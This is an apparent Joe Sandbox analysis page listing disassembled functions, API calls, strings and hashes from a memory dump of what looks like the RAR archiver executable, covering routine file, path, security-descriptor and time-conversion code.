API ID: ExceptionThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 932687459-0
Opcode ID: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
Instruction ID: d7ea9aa52405444cabc7ab9e35f93fea0bd2e8fd8c463d694a3d58e47908c654
Opcode Fuzzy Hash: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
Instruction Fuzzy Hash: 9681A062A0DAC385EB15AE11E4403FDA2D1EF44BA4F984132DA4D47B99DF7CE4629330

Function 00007FF7CF88C468 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 420COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF88C7AE
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF88C97F
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF88C9DC

Strings

xc%u, xrefs: 00007FF7CF88C9CC
;%u, xrefs: 00007FF7CF88C79E
x%u, xrefs: 00007FF7CF88C96F

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: swprintf
String ID: ;%u$x%u$xc%u
API String ID: 233258989-2277559157
Opcode ID: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
Instruction ID: 6c18a1dcc06d4a3433817e7b075bfd1dec43e77225adc0279d2d3f25f5df486f
Opcode Fuzzy Hash: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
Instruction Fuzzy Hash: 4F02B222B086C241EA24FE2599453FEA3D1AF427A0FC40035DE9E4779ADF7CE465A331

Function 00007FF7CF8A1634 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32 ref: 00007FF7CF8A1694
GetShortPathNameW.KERNEL32 ref: 00007FF7CF8A16B5

Part of subcall function 00007FF7CF8CDAC0: CompareStringW.KERNEL32(?,?,?,?,?,?,00007FF7CF8B4C1E,?,?,?,?,?,?,?,00007FF7CF8D9706), ref: 00007FF7CF8CDADF

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF8A175F
MoveFileW.KERNEL32 ref: 00007FF7CF8A17CD
MoveFileW.KERNEL32 ref: 00007FF7CF8A1815

Strings

rtmp%d, xrefs: 00007FF7CF8A1755

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: FileMoveNamePath$CompareLongShortStringswprintf
String ID: rtmp%d
API String ID: 2308737092-3303766350
Opcode ID: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
Instruction ID: b13be78e7598f2170458299d994e8885cde0c8b8f80c4c5c688b7fced498e046
Opcode Fuzzy Hash: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
Instruction Fuzzy Hash: 60516122A29AC649EB70BF21D8451FEA390FF40BA4F951031DD0D47A9ADE2CD625E730

Function 00007FF7CF8CB650 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32 ref: 00007FF7CF8CB66A
CloseHandle.KERNEL32 ref: 00007FF7CF8CB685
CreateEventW.KERNEL32 ref: 00007FF7CF8CB699
GetLastError.KERNEL32 ref: 00007FF7CF8CB6A6
CloseHandle.KERNEL32 ref: 00007FF7CF8CB6C0

Strings

rar -ioff, xrefs: 00007FF7CF8CB65C, 00007FF7CF8CB68B

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: CloseCreateEventHandle$ErrorLast
String ID: rar -ioff
API String ID: 4151682896-4089728129
Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
Instruction ID: 4b88d4c1a03e725db875cd4a8da0dc8e58cbb17a99100d865558ebbeaae24c8b
Opcode Fuzzy Hash: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
Instruction Fuzzy Hash: AA018B24A1DA878AFB14BF71EC506F0A3E1AF54B21FD45430D84E822A4CE2CA168A630

Function 00007FF7CF8CB470 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7CF8CB488
GetProcAddress.KERNEL32 ref: 00007FF7CF8CB4A0
GetProcAddress.KERNEL32 ref: 00007FF7CF8CB4D5

Strings

SetDefaultDllDirectories, xrefs: 00007FF7CF8CB4CB
kernel32, xrefs: 00007FF7CF8CB481
SetDllDirectoryW, xrefs: 00007FF7CF8CB496

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
API String ID: 667068680-1824683568
Opcode ID: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
Instruction ID: 7eaf021912bf0188cb786ec50abde6eec09b689b58bdc067da6320219fbcfca2
Opcode Fuzzy Hash: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
Instruction Fuzzy Hash: B5F01D25B09BC68AEB04AF51F8540B5A3A0BF59FE0B985130DD5E07768EE6CE469D330

Function 00007FF7CF8E1ADC Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 488COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7CF8E1B14
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7CF8E1E39
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7CF8E20BE

Strings

+, xrefs: 00007FF7CF8E1B96
-, xrefs: 00007FF7CF8E1B8B

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: +$-
API String ID: 3215553584-2137968064
Opcode ID: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
Instruction ID: 9d77c5339d3ca8763b23142be068d7352e5f9b6e1ddbdddd739526f4e1fb0fb8
Opcode Fuzzy Hash: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
Instruction Fuzzy Hash: E3127E2EF099C386FB64BE1590447F8A6D6EB40774FD94232D69A436C0DF2CA671A334

Function 00007FF7CF89E49C Relevance: 9.1, APIs: 6, Instructions: 148COMMON

Download Yara Rule

APIs

BackupRead.KERNEL32 ref: 00007FF7CF89E523
BackupRead.KERNEL32 ref: 00007FF7CF89E572
BackupSeek.KERNEL32 ref: 00007FF7CF89E5CB
BackupRead.KERNEL32 ref: 00007FF7CF89E641
BackupSeek.KERNEL32 ref: 00007FF7CF89E679
wcschr.LIBVCRUNTIME ref: 00007FF7CF89E6B4

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: Backup$Read$Seek$wcschr
String ID:
API String ID: 2092471728-0
Opcode ID: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
Instruction ID: 8a3e7d368d6f368dd07d7a0932eb346d4a2c5903b7b02653211890b92caa6e22
Opcode Fuzzy Hash: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
Instruction Fuzzy Hash: 2F51653260878186EB21DF15E4401EAB7E4FB85BA4F900236EA9D43B98DF3DE554DB30

Function 00007FF7CF8CBC8C Relevance: 9.1, APIs: 6, Instructions: 113timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7CF8A6754: GetVersionExW.KERNEL32 ref: 00007FF7CF8A6785

FileTimeToLocalFileTime.KERNEL32 ref: 00007FF7CF8CBCEF
FileTimeToSystemTime.KERNEL32 ref: 00007FF7CF8CBCFB
SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 00007FF7CF8CBD0B
SystemTimeToFileTime.KERNEL32 ref: 00007FF7CF8CBD19
SystemTimeToFileTime.KERNEL32 ref: 00007FF7CF8CBD27
FileTimeToSystemTime.KERNEL32 ref: 00007FF7CF8CBD68

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
Instruction ID: a2e40f7aff97174897273e5d7626792d5e24cee073e40d64728426ab84cb7a4d
Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
Instruction Fuzzy Hash: 93516BB2B106918EEB54DFB4D4401EC77B1F708B98BA0402ADE0E97B58EE38D565CB20

Function 00007FF7CF8CC254 Relevance: 9.1, APIs: 6, Instructions: 81timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32 ref: 00007FF7CF8CC2B8

Part of subcall function 00007FF7CF8A6754: GetVersionExW.KERNEL32 ref: 00007FF7CF8A6785

LocalFileTimeToFileTime.KERNEL32 ref: 00007FF7CF8CC2DA
FileTimeToSystemTime.KERNEL32 ref: 00007FF7CF8CC2E6
TzSpecificLocalTimeToSystemTime.KERNEL32 ref: 00007FF7CF8CC2F6
SystemTimeToFileTime.KERNEL32 ref: 00007FF7CF8CC304
SystemTimeToFileTime.KERNEL32 ref: 00007FF7CF8CC312

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
Instruction ID: a5d7d60d46195acff468ccd02accbcbb4676c165c5d5912981ee7e342a8663d8
Opcode Fuzzy Hash: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
Instruction Fuzzy Hash: 5B313A62F146918DEB04DFB4D8901EC77B0FB08B58B54502AEE0E97A58EB38D495D320

Function 00007FF7CF8BEB40 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7CF8872C4: new.LIBCMT ref: 00007FF7CF8873DE

new.LIBCMT ref: 00007FF7CF8BEBB4

Strings

sfx, xrefs: 00007FF7CF8BECC9
rebuilt., xrefs: 00007FF7CF8BECA3
exe, xrefs: 00007FF7CF8BECDC
rar, xrefs: 00007FF7CF8BECF2

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID:
String ID: exe$rar$rebuilt.$sfx
API String ID: 0-13699710
Opcode ID: 8ca027f0faffb6d8ce24db6bb8d864dc0127119bd94cdfd60b96efa7e743a067
Instruction ID: f1eeef85b1515d61a2cf6a040a662941c0917ef2b73d6d290c27f0a7ccfda185
Opcode Fuzzy Hash: 8ca027f0faffb6d8ce24db6bb8d864dc0127119bd94cdfd60b96efa7e743a067
Instruction Fuzzy Hash: CA818121A086C249EB20FF25D8152F9A7D2FB857A4FC04131DD4D4B6CADE6DE625E330

Function 00007FF7CF8DE0C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

abort.LIBCMT ref: 00007FF7CF8DE0F4
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF7CF8DE1BC
RtlUnwindEx.KERNEL32 ref: 00007FF7CF8DE20B

Strings

f, xrefs: 00007FF7CF8DE13A
csm, xrefs: 00007FF7CF8DE1A2

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: CurrentImageNonwritableUnwindabort
String ID: csm$f
API String ID: 3913153233-629598281
Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
Instruction ID: b4d8d8704de7cf28cb93b09e433d4aed3ba69231793c2a814e6d10f48071943d
Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
Instruction Fuzzy Hash: 1661C336B0968386EB14EF11E440AF9A7D1FF44BA4F948532EE4A47748DF38E851A730

Function 00007FF7CF89EA18 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

GetFileSecurityW.ADVAPI32(?,00007FF7CF89EBC2), ref: 00007FF7CF89EA7C
GetFileSecurityW.ADVAPI32(?,00007FF7CF89EBC2), ref: 00007FF7CF89EABC
GetSecurityDescriptorLength.ADVAPI32(?,00007FF7CF89EBC2), ref: 00007FF7CF89EB0A

Strings

, xrefs: 00007FF7CF89EAE3
ACL, xrefs: 00007FF7CF89EB39

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: Security$File$DescriptorLength
String ID: $ACL
API String ID: 2361174398-1852320022
Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
Instruction ID: 49e753eb76743656dce6155a4ed3cb63d63695dc4648c1fb70544003317f5dea
Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
Instruction Fuzzy Hash: 35317361A09AC286EB24EF11E8503E9A7E4FB98794FC04031DA4D5365ADF3CE625D770

Function 00007FF7CF887188 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

CompareStringOrdinal.KERNEL32 ref: 00007FF7CF88722B

Part of subcall function 00007FF7CF8A6754: GetVersionExW.KERNEL32 ref: 00007FF7CF8A6785

GetModuleHandleW.KERNEL32(?,?,?,?,?,00007FF7CF8868EB), ref: 00007FF7CF8871CB
GetProcAddress.KERNEL32(?,?,?,?,?,00007FF7CF8868EB), ref: 00007FF7CF8871E0

Strings

CompareStringOrdinal, xrefs: 00007FF7CF8871D6
kernel32.dll, xrefs: 00007FF7CF8871C4

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: AddressCompareHandleModuleOrdinalProcStringVersion
String ID: CompareStringOrdinal$kernel32.dll
API String ID: 2522007465-2120454788
Opcode ID: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
Instruction ID: cc627d49a2161c41c723b7bef80667d63a81a9a6c3489cd336f4a7e62a59a89c
Opcode Fuzzy Hash: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
Instruction Fuzzy Hash: BB217F21A0D6C285EB50BF11A8401F8E2F0BF55BA0FD44135EA5E83698EF2CE4659734

Function 00007FF7CF8CBE3C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

